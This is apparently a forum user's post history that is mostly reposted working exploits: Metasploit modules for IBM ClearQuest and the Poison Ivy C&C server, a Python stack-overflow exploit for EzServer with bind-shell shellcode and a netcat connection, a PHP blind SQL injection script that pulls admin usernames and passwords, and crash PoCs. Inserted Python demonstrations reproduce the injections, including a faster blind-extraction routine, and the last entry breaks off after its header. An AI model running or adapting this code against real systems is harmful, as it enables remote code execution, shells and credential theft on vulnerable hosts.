The_Arhitect
Everything posted by The_Arhitect

  1. https://www.youtube.com/watch?v=06WBbdaBWi8&feature=g-all-u
  2. UPDATE: Users whose internet service comes from RCS & RDS can no longer access the VPLAY site - IT & C > Capital.ro https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/ Proxy Server List - Romania - Proxy - Romanian Proxies
  3. IBM Rational ClearQuest CQOle Remote Code Execution

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::Remote::BrowserAutopwn

  autopwn_info({
    :ua_name    => HttpClients::IE,
    :ua_minver  => "6.0",
    :ua_maxver  => "7.0",
    :javascript => true,
    :os_name    => OperatingSystems::WINDOWS,
    :classid    => "{94773112-72E8-11D0-A42E-00A024DED613}",
    :method     => "RegisterSchemaRepoFromFileByDbSet",
    :rank       => NormalRanking
  })

  def initialize(info={})
    super(update_info(info,
      'Name'           => "IBM Rational ClearQuest CQOle Remote Code Execution",
      'Description'    => %q{
          This module exploits a function prototype mismatch on the CQOle ActiveX
        control in IBM Rational ClearQuest < 7.1.1.9, < 7.1.2.6 or < 8.0.0.2 which
        allows reliable remote code execution when DEP isn't enabled.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Andrea Micalizzi aka rgod', # Vulnerability discovery
          'juan vazquez'               # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2012-0708' ],
          [ 'BID', '53170' ],
          [ 'OSVDB', '81443'],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-113/' ],
          [ 'URL', 'http://www-304.ibm.com/support/docview.wss?uid=swg21591705' ],
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00"
        },
      'DefaultOptions' =>
        {
          'ExitFunction'         => "process",
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # cqole.dll 7.1100.0.150
          [ 'Automatic', {} ],
          [ 'IE 6 / IE7 (No DEP)', {} ], # Because of the nature of the vulnerability no DEP is a requisite
        ],
      'Privileged'     => false,
      'DisclosureDate' => "May 19 2012",
      'DefaultTarget'  => 0))
  end

  def get_target(agent)
    # If the target is already specified by the user, we'll just use that
    return target if target.name != 'Automatic'

    if agent =~ /NT 5\.1/ and agent =~ /MSIE 6/
      return targets[1]  # IE 6 on Windows XP
    elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7/
      return targets[1]  # IE 7 on Windows XP
    elsif agent =~ /NT 6\.0/ and agent =~ /MSIE 7/
      return targets[1]  # IE 7 on Windows Vista
    else
      return nil
    end
  end

  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    my_target = get_target(agent)

    # Avoid the attack if the victim doesn't have the same setup we're targeting
    if my_target.nil?
      print_error("#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}")
      send_not_found(cli)
      return
    end

    js_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(my_target.arch))

    object_id   = rand_text_alpha(rand(8) + 4)
    dbset_value = rand_text_alpha(rand(8) + 4)
    var_payload = rand_text_alpha(rand(8) + 4)

    # The second argument is passed to a method that only pops one argument (see notes below),
    # so the attacker-controlled value ends up where the dispatcher's ret expects the return address.
    html = <<-EOS
    <html>
    <body>
    <object id='#{object_id}' classid='clsid:94773112-72E8-11D0-A42E-00A024DED613'></object>
    <script language="JavaScript">
      var #{var_payload} = unescape("#{js_code}")
      #{object_id}.RegisterSchemaRepoFromFileByDbSet("#{dbset_value}", #{var_payload});
    </script>
    </body>
    </html>
    EOS

    html = html.gsub(/^\t\t/, '')

    print_status("#{cli.peerhost}:#{cli.peerport} - Sending html")
    send_response(cli, html, {'Content-Type'=>'text/html'})
  end

end

=begin
* RegisterSchemaRepoFromFile and not RegisterSchemaRepoFromFileByDbSet is called:

Breakpoint 0 hit
eax=3190b1a0 ebx=00000000 ecx=03015cf0 edx=7835f5d2 esi=0013e200 edi=0000000c
eip=78371062 esp=0013e204 ebp=0013e2b4 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
MFC80U!_AfxDispatchCall+0xe:
78371062 ffd0            call    eax {cqole!OAdSession::RegisterSchemaRepoFromFile (3190b1a0)}

* RegisterSchemaRepoFromFile prototype (it is going to be executed):

.text:31865E40 ; protected: wchar_t * __thiscall OAdAdminSession::RegisterSchemaRepoFromFile(wchar_t const *)

Its ret is: retn 4

* RegisterSchemaRepoFromFileByDbSet prototype (it should be executed):

.text:31866280 ; protected: wchar_t * __thiscall OAdAdminSession::RegisterSchemaRepoFromFileByDbSet(wchar_t const *, wchar_t const *)

Its ret is: retn 8

* When RegisterSchemaRepoFromFile returns to MFC80U!_AfxDispatchCall this is what happens:

0:000> p
eax=00186864 ebx=00000000 ecx=442d618d edx=00070001 esi=0013e200 edi=0000000c
eip=78371064 esp=0013e208 ebp=0013e2b4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
MFC80U!_AfxDispatchCall+0x10:
78371064 c3              ret
0:000> dd esp
0013e208  001dcff4 7835f5d2 fffffffe 78336a3a

ESP is pointing to the second argument of RegisterSchemaRepoFromFileByDbSet and not to the stored EIP on the stack. The ret from MFC80U!_AfxDispatchCall allows control to be gained in a reliable way when DEP is disabled.
=end

Source: IBM Rational ClearQuest CQOle Remote Code Execution
  4. Poison Ivy 2.3.2 C&C Server Buffer Overflow

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Brute

  def initialize(info = {})
    super(update_info(info,
      'Name'           => "Poison Ivy 2.3.2 C&C Server Buffer Overflow",
      'Description'    => %q{
          This module exploits a stack buffer overflow in Poison Ivy 2.3.2 C&C server.
        The exploit does not need to know the password chosen for the bot/server
        communication. If the C&C is configured with the default 'admin' password,
        the exploit should work fine. In case of the C&C configured with another
        password the exploit can fail. The 'check' command can be used to determine
        if the C&C target is using the default 'admin' password. Hopefully an exploit
        try won't crash the Poison Ivy C&C process, just the thread responsible for
        handling the connection. Because of this the module provides the RANDHEADER
        option and a bruteforce target. If RANDHEADER is used a random header will
        be used. If the bruteforce target is selected, a random header will be sent
        in case the default for the password 'admin' doesn't work. Bruteforce will
        stop after 5 tries or a session obtained.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Andrzej Dereszowski', # Vulnerability Discovery
          'Gal Badishi',         # Exploit and Metasploit module
          'juan vazquez'         # Testing and little of Metasploit-fu
        ],
      'References'     =>
        [
          [ 'URL', 'http://www.signal11.eu/en/research/articles/targeted_2010.pdf' ],
          [ 'URL', 'http://badishi.com/own-and-you-shall-be-owned' ]
        ],
      'DisclosureDate' => "Jun 24 2012",
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
        },
      'Payload'        =>
        {
          'StackAdjustment' => -4000,
          'Space'           => 10000,
          'BadChars'        => "",
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Poison Ivy 2.3.2 / Windows XP SP3 / Windows 7 SP1',
            {
              'Ret'           => 0x0041AA97, # jmp esp from "Poison Ivy 2.3.2.exe"
              'RWAddress'     => 0x00401000,
              'Offset'        => 0x806D,
              'PayloadOffset' => 0x75,
              'jmpPayload'    => "\x81\xec\x00\x80\x00\x00\xff\xe4" # sub esp,0x8000 # jmp esp
            }
          ],
          [ 'Poison Ivy 2.3.2 - Bruteforce / Windows XP SP3 / Windows 7 SP1',
            {
              'Ret'           => 0x0041AA97, # jmp esp from "Poison Ivy 2.3.2.exe"
              'RWAddress'     => 0x00401000,
              'Offset'        => 0x806D,
              'PayloadOffset' => 0x75,
              'jmpPayload'    => "\x81\xec\x00\x80\x00\x00\xff\xe4", # sub esp,0x8000 # jmp esp
              'Bruteforce'    =>
                {
                  'Start' => { 'Try' => 1 },
                  'Stop'  => { 'Try' => 6 },
                  'Step'  => 1,
                  'Delay' => 2
                }
            }
          ],
        ],
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        Opt::RPORT(3460),
        OptBool.new('RANDHEADER', [true, 'Send random bytes as the header', false])
      ], self.class)

    register_advanced_options(
      [
        OptInt.new('BruteWait', [ false, "Delay between brute force attempts", 2 ]),
      ], self.class)
  end

  def check
    # Response signature of a C&C using the default 'admin' password, and the expected length field
    sig = "\x35\xe1\x06\x6c\xcd\x15\x87\x3e\xee\xf8\x51\x89\x66\xb7\x0f\x8b"
    lensig = [0x000015D0].pack("V")

    connect
    sock.put("\x00" * 256)
    response = sock.read(256)
    datalen = sock.read(4)
    disconnect

    if datalen == lensig
      if response[0, 16] == sig
        print_status("Password appears to be \"admin\"")
      else
        print_status("Unknown password - Bruteforce target or RANDHEADER can be tried and exploit launched until success.")
      end
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end

  def single_exploit
    if datastore['RANDHEADER'] == true
      # Generate a random header - allows multiple invocations of the exploit if it fails because we don't know the password
      header = rand_text(0x20)
    else
      # This is the 32-byte header we want to send, encrypted with the default password ("admin")
      # We have a very good chance of succeeding even if the password was changed
      header = "\xe7\x77\x44\x30\x9a\xe8\x4b\x79\xa6\x3f\x11\xcd\x58\xab\x0c\xdf\x2a\xcc\xea\x77\x6f\x8c\x27\x50\xda\x30\x76\x00\x5d\x15\xde\xb7"
    end
    do_exploit(header)
  end

  def brute_exploit(brute_target)
    if brute_target['Try'] == 1
      print_status("Bruteforcing - Try #{brute_target['Try']}: Header for 'admin' password")
      # This is the 32-byte header we want to send, encrypted with the default password ("admin")
      # We have a very good chance of succeeding even if the password was changed
      header = "\xe7\x77\x44\x30\x9a\xe8\x4b\x79\xa6\x3f\x11\xcd\x58\xab\x0c\xdf\x2a\xcc\xea\x77\x6f\x8c\x27\x50\xda\x30\x76\x00\x5d\x15\xde\xb7"
    else
      print_status("Bruteforcing - Try #{brute_target['Try']}: Random Header")
      # Generate a random header - allows multiple invocations of the exploit if it fails because we don't know the password
      header = rand_text(0x20)
    end
    do_exploit(header)
  end

  def do_exploit(header)
    # Handshake
    connect
    print_status("Performing handshake...")
    sock.put("\x00" * 256)
    sock.get

    # Don't change the nulls, or it might not work
    xploit = ''
    xploit << header
    xploit << "\x00" * (target['PayloadOffset'] - xploit.length)
    xploit << payload.encoded
    xploit << "\x00" * (target['Offset'] - xploit.length)
    xploit << [target.ret].pack("V")           # ret to a jmp esp opcode
    xploit << [target['RWAddress']].pack("V")  # Readable/writeable - will be cleaned by original ret 4 (esp will point to the next dword)
    xploit << target['jmpPayload']             # This comes immediately after ret - it is a setup for the payload (jmp back)

    # The disconnection triggers the exploit
    print_status("Sending exploit...")
    sock.put(xploit)
    select(nil,nil,nil,5)
    disconnect
  end

end

=begin
* ROP version of exploit(): Has been discarded at the moment because of two reasons:
  (1) Poison Ivy fails to run on DEP enabled systems (maybe due to the unpacking process)
  (2) When trying an unpacked version on DEP enabled systems the windows/exec payload runs, but not meterpreter
=end

Source: Poison Ivy 2.3.2 C&C Server Buffer Overflow
  5. DEEPSIDE DEEJAYS - LOOK INTO MY EYES [OFFICIAL SINGLE 2012] - YouTube
  6. WordPress Website FAQ Plugin v1.0 SQL Injection

# Exploit Title: WordPress Website FAQ Plugin v1.0 SQL Injection
# Date: 6/25/12
# Exploit Author: Chris Kellum
# Vendor Homepage: http://wordpress.org/extend/plugins/website-faq/
# Software Link: http://downloads.wordpress.org/plugin/website-faq.zip
# Version: 1.0

==============================================================================
Vulnerability location: /wp-content/plugins/website-faq/website-faq-widget.php
==============================================================================

Lines 106-115:

function displayAnswer() {
    global $wpdb;
    $master_table = $wpdb->prefix . "faq";
    $category = $_POST['category'];
    $searchtxt = $_POST['searchtxt'];
    if($category!=0) {
        $sql = "SELECT * FROM $master_table WHERE faq_category=".$category." AND faq_question LIKE '%".$searchtxt."%'";
    }

===============================================================
Vulnerability Details: faq_category vulnerable to SQL injection
===============================================================

When submitting a query via the widget, intercept the POST request via Burp or another proxy to find the following:

action=displayAnswer&category=1&searchtxt=[your query]

Changing category=1 to category=1 or 1=1 -- exposes the vulnerability, as it returns all FAQ results regardless of the searchtxt value.

Source: WordPress Website FAQ Plugin v1.0 SQL Injection
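Added example, not part of the post above or of the plugin: the query construction quoted from website-faq-widget.php reproduced in Python over an in-memory SQLite table, beside a parameterised version. The `faq` rows and the `int()` cast are constructed for the demonstration; the plugin itself talks to MySQL through `$wpdb`, where `$wpdb->prepare()` with `%d`/`%s` placeholders is the equivalent fix.

```python
import sqlite3

# Constructed rows standing in for the wp_faq table; column names follow the
# snippet quoted from website-faq-widget.php (faq_category, faq_question).
FAQ_ROWS = [
    (1, 1, "How do I reset my password?"),
    (2, 1, "Where is the login page?"),
    (3, 2, "Can I export my data?"),
    (4, 3, "Is there a mobile app?"),
]


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE faq (id INTEGER, faq_category INTEGER, faq_question TEXT)")
    con.executemany("INSERT INTO faq VALUES (?, ?, ?)", FAQ_ROWS)
    return con


def display_answer_vulnerable(con, category, searchtxt):
    """Same construction as the plugin: both POST values are spliced into the SQL text."""
    sql = ("SELECT * FROM faq WHERE faq_category=" + category
           + " AND faq_question LIKE '%" + searchtxt + "%'")
    return con.execute(sql).fetchall()


def display_answer_fixed(con, category, searchtxt):
    """Parameterised form: category must be an integer and searchtxt is bound as a
    value, so neither can change the structure of the query."""
    sql = "SELECT * FROM faq WHERE faq_category=? AND faq_question LIKE ?"
    return con.execute(sql, (int(category), "%" + searchtxt + "%")).fetchall()


def fixed_rejects(con, category, searchtxt):
    """True when the hardened version refuses the category value outright."""
    try:
        display_answer_fixed(con, category, searchtxt)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    con = make_db()
    injected = "1 or 1=1 -- "   # the value the advisory substitutes for category=1
    print("honest request :", display_answer_vulnerable(con, "1", "password"))
    print("injected       :", display_answer_vulnerable(con, injected, "zzz"))  # every row
    print("fixed, injected:", "rejected" if fixed_rejects(con, injected, "zzz") else "ran")
```

With the injected category the vulnerable query returns all four rows even though no question contains "zzz", because the `--` comments out the `LIKE` clause; the parameterised version never reaches the database with that value.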
  7. Ezhometech Ezserver 6.4 Stack Overflow Exploit

# Exploit Title: Ezhometech EzServer <=6.4 Stack Overflow Vulnerability
# Author: modpr0be
# Contact: research[at]Spentera[dot]com
# Platform: Windows
# Tested on: Windows XP SP3 (OptIn), Windows 2003 SP2 (OptIn)
# Software Link: http://www.ezhometech.com/buy_ezserver.htm
# References: http://www.spentera.com/2012/06/ezhometech-ezserver-6-4-stack-overflow-vulnerability/

### Software Description
# EZserver is a Video Server that streams Full HD to various devices.

### Vulnerability Details
# A buffer overflow condition exists in URL handling; sending a long GET request
# will cause the server process to exit and may allow malicious code injection.
# Further research found that the application does not care about the HTTP method,
# so sending a long string of characters will make the program crash.

### Vendor logs:
# 06/11/2012 - Bug found
# 06/12/2012 - Vendor contacted
# 06/16/2012 - No response from vendor, POC release.

#!/usr/bin/python
import sys
import struct
from socket import *
from os import system
from time import sleep

# egghunter: walks memory looking for the "w00tw00t" tag placed in front of the shellcode
hunt = (
"\x66\x81\xCA\xFF\x0F\x42\x52\x6A"
"\x02\x58\xCD\x2E\x3C\x05\x5A\x74"
"\xEF\xB8\x77\x30\x30\x74\x8B\xFA"
"\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")

#windows/shell_bind_tcp - 751 bytes
#http://www.metasploit.com
#Encoder: x86/alpha_upper
#AutoRunScript=, VERBOSE=false, EXITFUNC=process, LPORT=4444,
shellcode = (
"\x89\xe5\xda\xcf\xd9\x75\xf4\x5d\x55\x59\x49\x49\x49\x49\x43"
"\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34"
"\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4d\x38\x4c\x49\x45\x50"
"\x35\x50\x53\x30\x35\x30\x4b\x39\x4a\x45\x36\x51\x38\x52\x33"
"\x54\x4c\x4b\x50\x52\x56\x50\x4c\x4b\x46\x32\x44\x4c\x4c\x4b"
"\x30\x52\x45\x44\x4c\x4b\x33\x42\x37\x58\x44\x4f\x38\x37\x51"
"\x5a\x57\x56\x50\x31\x4b\x4f\x36\x51\x4f\x30\x4e\x4c\x47\x4c"
"\x53\x51\x43\x4c\x34\x42\x46\x4c\x37\x50\x49\x51\x38\x4f\x54"
"\x4d\x53\x31\x38\x47\x4a\x42\x4a\x50\x36\x32\x56\x37\x4c\x4b"
"\x56\x32\x44\x50\x4c\x4b\x37\x32\x37\x4c\x43\x31\x38\x50\x4c"
"\x4b\x37\x30\x33\x48\x4b\x35\x59\x50\x54\x34\x31\x5a\x33\x31"
"\x4e\x30\x36\x30\x4c\x4b\x30\x48\x52\x38\x4c\x4b\x56\x38\x57"
"\x50\x53\x31\x4e\x33\x4a\x43\x57\x4c\x30\x49\x4c\x4b\x50\x34"
"\x4c\x4b\x53\x31\x39\x46\x50\x31\x4b\x4f\x36\x51\x59\x50\x4e"
"\x4c\x59\x51\x48\x4f\x34\x4d\x45\x51\x59\x57\x50\x38\x4b\x50"
"\x53\x45\x5a\x54\x33\x33\x53\x4d\x4b\x48\x47\x4b\x33\x4d\x31"
"\x34\x42\x55\x4a\x42\x46\x38\x4c\x4b\x36\x38\x31\x34\x45\x51"
"\x38\x53\x55\x36\x4c\x4b\x54\x4c\x50\x4b\x4c\x4b\x50\x58\x35"
"\x4c\x43\x31\x59\x43\x4c\x4b\x34\x44\x4c\x4b\x35\x51\x48\x50"
"\x4c\x49\x31\x54\x31\x34\x57\x54\x51\x4b\x31\x4b\x55\x31\x56"
"\x39\x30\x5a\x50\x51\x4b\x4f\x4d\x30\x31\x48\x31\x4f\x30\x5a"
"\x4c\x4b\x54\x52\x5a\x4b\x4d\x56\x51\x4d\x33\x58\x37\x43\x47"
"\x42\x45\x50\x53\x30\x43\x58\x34\x37\x53\x43\x46\x52\x31\x4f"
"\x50\x54\x52\x48\x30\x4c\x54\x37\x46\x46\x53\x37\x4b\x4f\x39"
"\x45\x58\x38\x4c\x50\x55\x51\x43\x30\x45\x50\x37\x59\x58\x44"
"\x46\x34\x56\x30\x53\x58\x31\x39\x4d\x50\x32\x4b\x45\x50\x4b"
"\x4f\x58\x55\x36\x30\x56\x30\x56\x30\x46\x30\x47\x30\x46\x30"
"\x31\x50\x46\x30\x55\x38\x4a\x4a\x44\x4f\x39\x4f\x4b\x50\x4b"
"\x4f\x48\x55\x4d\x59\x59\x57\x50\x31\x59\x4b\x30\x53\x55\x38"
"\x55\x52\x35\x50\x52\x31\x51\x4c\x4b\x39\x4a\x46\x32\x4a\x32"
"\x30\x31\x46\x50\x57\x35\x38\x49\x52\x59\x4b\x56\x57\x53\x57"
"\x4b\x4f\x39\x45\x30\x53\x51\x47\x52\x48\x4e\x57\x4d\x39\x37"
"\x48\x4b\x4f\x4b\x4f\x49\x45\x51\x43\x50\x53\x30\x57\x35\x38"
"\x44\x34\x5a\x4c\x47\x4b\x4b\x51\x4b\x4f\x49\x45\x56\x37\x4c"
"\x49\x58\x47\x43\x58\x34\x35\x42\x4e\x50\x4d\x53\x51\x4b\x4f"
"\x58\x55\x55\x38\x43\x53\x52\x4d\x33\x54\x55\x50\x4c\x49\x4b"
"\x53\x51\x47\x46\x37\x31\x47\x36\x51\x4c\x36\x33\x5a\x42\x32"
"\x31\x49\x46\x36\x5a\x42\x4b\x4d\x45\x36\x48\x47\x47\x34\x31"
"\x34\x37\x4c\x55\x51\x33\x31\x4c\x4d\x30\x44\x47\x54\x44\x50"
"\x48\x46\x35\x50\x30\x44\x30\x54\x30\x50\x46\x36\x51\x46\x56"
"\x36\x37\x36\x46\x36\x30\x4e\x31\x46\x51\x46\x51\x43\x31\x46"
"\x32\x48\x52\x59\x48\x4c\x57\x4f\x4b\x36\x4b\x4f\x38\x55\x4d"
"\x59\x4d\x30\x50\x4e\x56\x36\x51\x56\x4b\x4f\x36\x50\x43\x58"
"\x54\x48\x4c\x47\x55\x4d\x33\x50\x4b\x4f\x4e\x35\x4f\x4b\x4a"
"\x50\x58\x35\x4f\x52\x36\x36\x53\x58\x49\x36\x4d\x45\x4f\x4d"
"\x4d\x4d\x4b\x4f\x58\x55\x47\x4c\x43\x36\x53\x4c\x35\x5a\x4d"
"\x50\x4b\x4b\x4d\x30\x54\x35\x55\x55\x4f\x4b\x57\x37\x35\x43"
"\x32\x52\x52\x4f\x43\x5a\x45\x50\x51\x43\x4b\x4f\x4e\x35\x41"
"\x41")

# padding up to the saved return address differs per target OS
junk1 = "\x41" * 5025
junk2 = "\x42" * 5029
junk3 = "\x43" * 10000

buff = "w00tw00t"                           # egg tag the hunter searches for
buff+= shellcode
buff+= "\x90" * 100
buff+= "\xeb\x08\x90\x90"                   # short jmp over the return address
buff+= struct.pack('<L', 0x10212779)        # overwritten return address
buff+= "\x90" * 16
buff+= hunt
buff+= "\x44" * 5000

def winxp():
    try:
        host = raw_input("[!] Target IP: ")
        print "[!] Connecting to %s on port 8000" %host
        s = socket(AF_INET, SOCK_STREAM)
        s.connect((host,8000))
        print "[+] Launching attack.."
        print "[+] Sending payload.."
        payload = junk1+buff
        s.send (payload)
        s.close()
        print "[+] Wait for hunter.."
        sleep(5)
        print "[+] Connecting to target shell!"
        sleep(2)
        system("nc -v %s 4444" %host)
    except:
        print "[x] Could not connect to the server x_x"
        sys.exit()

def win2k3():
    try:
        host = raw_input("[!] Target IP: ")
        print "[!] Connecting to %s on port 8000" %host
        s = socket(AF_INET, SOCK_STREAM)
        s.connect((host,8000))
        print "[+] Launching attack.."
        print "[+] Sending payload.."
        payload = junk2+buff
        s.send(payload)
        s.close()
        print "[+] Wait for hunter.."
        sleep(5)
        print "[+] Connecting to target shell!"
        sleep(1)
        system("nc -v %s 4444" %host)
    except:
        print "[x] Could not connect to the server x_x"
        sys.exit()

def crash():
    try:
        host = raw_input("[!] Target IP: ")
        print "[!] Connecting to %s on port 8000" %host
        s = socket(AF_INET, SOCK_STREAM)
        s.connect((host,8000))
        print "[+] Launching attack.."
        print "[+] Sending payload.."
        payload = junk3
        s.send (payload)
        s.close()
        print "[+] Server should be crashed! Check your debugger"
    except:
        print "[x] Could not connect to the server x_x"
        sys.exit()

print "#################################################################"
print "#    EZHomeTech EZServer <= 6.4.0.17 Stack Overflow Exploit     #"
print "#           by modpr0be[at]spentera | @modpr0be                 #"
print "#       thanks to: otoy, cikumel, y0k | @spentera               #"
print "================================================================="
print "\t1.Windows XP SP3 (DEP OptIn) bindshell on port 4444"
print "\t2.Windows 2003 SP2 (DEP OptIn) bindshell on port 4444"
print "\t3.Crash only (debug)\n"

a = 0
while a < 3:
    a = a + 1
    op = input ("[!] Choose your target OS: ")
    if op == 1:
        winxp()
        sys.exit()
    elif op == 2:
        win2k3()
        sys.exit()
    elif op == 3:
        crash()
        sys.exit()
    else:
        print "[-] Oh plz.. pick the right one \r\n"

Source: Ezhometech Ezserver 6.4 Stack Overflow Exploit
  8. MyTickets 1 to 2.0.8 Blind SQL Injection

<?php
/*
---------------------------------------------------------------
MyTickets <= Remote Blind SQL Injection Exploit by al-swisre
---------------------------------------------------------------
author...............: al-swisre
mail.................: oy3[at]hotmail[dot]com
software link........: http://phpx3.com/scripts.html#mytickets
affected versions....: from 1 to 2.0.8

[-] Vulnerable code in include/system/general/define.php:

43. if(empty($cookies['language'])){
44.     setcookie('MyTickets_language',$setting['default_language'],time()+86400,"/");
45.     $language = $setting['default_language'];
46. }else{
47.     if($db->count('languages',"`id`='".$cookies['language']."'") == 0){
48.         $language = $setting['default_language'];
49.     }
50.     $language = $cookies['language'];
51. }
52.
53. $language_array = $db->fetch($db->query("SELECT * FROM `languages` WHERE `id`='".$language."'"));
*/

print "\n+--------------------------------------------------------------------+";
print "\n|     MyTickets <= Remote Blind SQL Injection Exploit by al-swisre    |";
print "\n+--------------------------------------------------------------------+\n";

if (!extension_loaded('curl')) die("cURL extension required\n");

error_reporting(E_ERROR);
set_time_limit(0);

// send the injection in the MyTickets_language cookie and return the raw response
function get($url,$inj)
{
    $curl = curl_init();
    curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,3);
    curl_setopt($curl,CURLOPT_URL,$url);
    curl_setopt($curl, CURLOPT_COOKIE, "MyTickets_language=1$inj");
    curl_setopt($curl, CURLOPT_HEADER, 1);
    curl_setopt($curl, CURLOPT_VERBOSE, 0);
    $calis = curl_exec($curl);
    @curl_close($curl); // original passed the response string instead of the handle
    return $calis;
}

// a response containing "include" is treated as the "condition false" page
function chek_get($connect)
{
    if(eregi("include",$connect)) {
        return false;
    } else {
        return true;
    }
}

if ($argc < 2) {
    print "\nUsage......: php $argv[0] <url>\n";
    print "\nExample....: php $argv[0] http://localhost/mytickets/\n";
    die();
}

$sql_f = chek_get(get($argv[1],"' and 1='2 /*"));
$sql_t = chek_get(get($argv[1],"' and 1='1 /*"));

if($sql_t == $sql_f) {
    print "\n\t sorry: magic_quotes_gpc = On ): \n";
    die();
}

print "\n\t[+] Getting Admin Username and Password\n\n\t";

for ($g = 1; $g <= 40; $g++) { // edit
    for ($i = 46; $i <= 122; $i++) {
        $inject = chek_get(get($argv[1],"'+AnD+ascii(MiD((sElect+concat_ws(0x3a,username,password)+frOm+members+liMit 0,1),".$g.",1))='".$i."/*"));
        if($inject == true){print chr($i);}
    }
}
?>

Source: MyTickets 1 to 2.0.8 Blind SQL Injection
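Added example, not from al-swisre's exploit: the same boolean oracle (a response without the word "include" means the injected condition held) driven with a binary search per character, so each character costs about 7 requests instead of the linear scan over 46..122 in the post. The target is simulated with an in-memory SQLite database, so the MySQL `ascii(mid(...))` and `concat_ws` of the original are replaced by SQLite's `unicode(substr(...))` and `||`, and the `/*` comment terminator by `-- `; the `languages` and `members` rows are constructed.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the MyTickets schema: the `languages` table read by the
    vulnerable query in define.php and the `members` table the exploit extracts from."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE languages (id INTEGER, name TEXT)")
    con.execute("INSERT INTO languages VALUES (1, 'en')")
    con.execute("CREATE TABLE members (username TEXT, password TEXT)")
    con.execute("INSERT INTO members VALUES ('admin', '5f4dcc3b5aa765d6')")
    return con


def vulnerable_page(con, cookie_language):
    """Simulates define.php: the cookie value is concatenated into the query. When the
    lookup returns no row the exploit expects an include() warning in the page; that
    signal is reproduced here as the word 'include' in the body."""
    sql = "SELECT * FROM languages WHERE id='" + cookie_language + "'"
    rows = con.execute(sql).fetchall()
    return "<html>ok</html>" if rows else "Warning: include(lang/.php): failed to open stream"


def oracle(con, inj):
    """True when the injected condition held (the exploit's chek_get(get(url, inj)))."""
    return "include" not in vulnerable_page(con, "1" + inj)


def extract(con, subquery, max_len=64):
    """Boolean-blind extraction of the first row of `subquery`, one character at a time,
    with a binary search over code points 32..127 (about 7 oracle calls per character)."""
    out = ""
    for pos in range(1, max_len + 1):
        probe = "' AND unicode(substr((%s),%d,1))>%%d -- " % (subquery, pos)
        # Past the end of the string substr() yields '' and unicode('') is NULL,
        # so the comparison is false and extraction stops.
        if not oracle(con, probe % 31):
            break
        lo, hi = 31, 127          # invariant: lo < code point <= hi
        while hi - lo > 1:
            mid = (lo + hi) // 2
            if oracle(con, probe % mid):
                lo = mid
            else:
                hi = mid
        out += chr(hi)
    return out


if __name__ == "__main__":
    con = make_db()
    print("oracle true :", oracle(con, "' AND 1=1 -- "))
    print("oracle false:", oracle(con, "' AND 1=2 -- "))
    print(extract(con, "SELECT username||':'||password FROM members LIMIT 1"))
```

The two calibration calls correspond to the exploit's `$sql_t`/`$sql_f` check: if both return the same answer the oracle is not working (on the real target, typically because `magic_quotes_gpc` escapes the quote) and extraction should not proceed.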
  9. Total Video Player 1.31 .m3u Crash PoC

# Exploit Title: Total Video Player 1.31 .m3u Crash Poc
# Date: June 17 2012
# Exploit Author: 0dem
# Vendor Homepage: http://www.effectmatrix.com/
# Software Link: http://download.cnet.com/Total-Video-Player/3000-2139_4-10552696.html
# Version: V1.31
# Tested on: Windows XP SP 3
# Description: Total Video Player has no correct input handling and will hang
#              when trying to open malformed .m3u files. .mp3 and .avi files are affected too.

# --- m3u -----------------------------------------------
#!/usr/bin/python
junk = "#EXTM3U\n"
junk += "#EXTINF:666, 0dem, 0dem\n"
junk += "c:\\A"
file = open("PoC.m3u","w")
file.writelines(junk)
file.close()

# --- mp3 -----------------------------------------------
#!/usr/bin/python
junk = "\x41" * 100
file = open("PoC.mp3","w")
file.writelines(junk)
file.close()

# --- avi -----------------------------------------------
#!/usr/bin/python
junk = "\x41" * 100
file = open("PoC.avi","w")
file.writelines(junk)
file.close()

Source: Total Video Player 1.31 .m3u Crash PoC
  10. OpenType Font File Format DoS Exploit for Windows

************************************************************************
OpenType font file format remote (client-side) DoS exploit for Windows
By Oleksiuk Dmytro (aka Cr4sh)
http://twitter.com/d_olex
http://blog.cr4.sh
mailto:cr4sh0@gmail.com
************************************************************************

INFO:

